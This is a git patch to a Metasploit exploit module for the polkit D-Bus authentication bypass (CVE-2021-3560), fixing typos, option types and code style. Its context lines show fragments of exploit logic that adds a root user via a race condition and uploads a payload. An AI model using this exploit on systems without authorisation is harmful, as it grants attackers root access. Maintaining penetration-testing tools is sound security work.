From 9a07039e7e66fb8054642efde15e523cab1dfd5e Mon Sep 17 00:00:00 2001
From: Jack Heysel <jack_heysel@rapid7.com>
Date: Mon, 28 Jun 2021 14:02:51 -0400
Subject: [PATCH] Updated docs

---
 .../linux/local/polkit_dbus_auth_bypass.md    |  8 +++----
 .../linux/local/polkit_dbus_auth_bypass.rb    | 24 +++++++++----------
 2 files changed, 16 insertions(+), 16 deletions(-)

diff --git a/documentation/modules/exploit/linux/local/polkit_dbus_auth_bypass.md b/documentation/modules/exploit/linux/local/polkit_dbus_auth_bypass.md
index f1f90f6f5a..b295bfcd7f 100644
--- a/documentation/modules/exploit/linux/local/polkit_dbus_auth_bypass.md
+++ b/documentation/modules/exploit/linux/local/polkit_dbus_auth_bypass.md
@@ -1,6 +1,6 @@
 ## Description
 
-This module exploits a authentication bypass in Linux machines that make use of the polkit is a system service.
+This module exploits a authentication bypass in Linux machines that make use of the polkit system service.
 The vulnerability enables an unprivileged local user to get a root shell on the system.
 
 ## Vulnerable Application
@@ -27,15 +27,15 @@ Download and install Ubuntu 20.04 from the Ubuntu Downloads page: https://ubuntu
 **SESSION**
 The session to run this module on.
 
-**WRITABLE_DIR**
-Directory to write file to (`%TEMP%` by default).
-
 **USERNAME**
 The name of the user the exploit will add to the system
 
 **PASSWORD**
 The password for the user to be created
 
+**WritableDir**
+Directory to write file to (`%TEMP%` by default).
+
 ## Scenarios
 
 ### Tested on Ubuntu 20.04
diff --git a/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb b/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
index f22d07b135..1e165465d6 100644
--- a/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
+++ b/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
@@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Local
         'References' => [
           ['URL', 'https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/'],
           ['CVE', '2021-3560'],
-          ['EDB', '50011'],
+          ['EDB', '50011']
         ],
         'Targets' =>
           [
@@ -60,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Local
     register_options([
       OptString.new('USERNAME', [ true, 'A username to add as root', 'msf' ], regex: /^[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\$)$/),
       OptString.new('PASSWORD', [ true, 'A password to add for the user (default: random)', rand_text_alphanumeric(8)]),
-      OptString.new('ITERATIONS', [ true, 'Due to the race condition the command might have to be run multiple times before it is successful. Use this to define how many times each command is attempted', 20])
+      OptInt.new('ITERATIONS', [ true, 'Due to the race condition the command might have to be run multiple times before it is successful. Use this to define how many times each command is attempted', 20])
     ])
     register_advanced_options([
       OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
@@ -145,7 +145,7 @@ class MetasploitModule < Msf::Exploit::Local
       if exploit_set_realname(rand_text_alphanumeric(12))
         status = CheckCode::Vulnerable('The polkit framework instance is vulnerable.')
         unless exploit_set_realname(old_realname)
-          print_error('Failed to restore the root user\'s orignal \'RealName\' property value')
+          print_error('Failed to restore the root user\'s original \'RealName\' property value')
         end
       end
     end
@@ -227,9 +227,9 @@ class MetasploitModule < Msf::Exploit::Local
     cmd_args << object_path
     cmd_args << interface_member
     args.each do |arg|
-      if arg.is_a? Integer
+      if arg.is_a?(Integer)
         cmd_args << "int32:#{arg}"
-      elsif arg.is_a? String
+      elsif arg.is_a?(String)
         cmd_args << "string:'#{arg}'"
       end
     end
@@ -320,15 +320,15 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def upload(path, data)
-    print_status "Writing '#{path}' (#{data.size} bytes) ..."
-    rm_f path
-    write_file path, data
-    register_file_for_cleanup path
+    print_status("Writing '#{path}' (#{data.size} bytes) ...")
+    rm_f(path)
+    write_file(path, data)
+    register_file_for_cleanup(path)
   end
 
   def upload_and_chmodx(path, data)
-    upload path, data
-    chmod path
+    upload(path, data)
+    chmod(path)
   end
 
   def upload_payload
@@ -351,7 +351,7 @@ class MetasploitModule < Msf::Exploit::Local
     if exploit_set_username(loop_sequence)
       uid = cmd_exec("id -u #{datastore['USERNAME']}")
       print_good("User #{datastore['USERNAME']} created with UID #{uid}")
-      print_status("Attempting to set the password of the newly create user, #{datastore['USERNAME']}, to: #{datastore['PASSWORD']}")
+      print_status("Attempting to set the password of the newly created user, #{datastore['USERNAME']}, to: #{datastore['PASSWORD']}")
       if exploit_set_password(uid, create_unix_crypt_hash, loop_sequence)
         print_good('Obtained code execution has root!')
         fname = upload_payload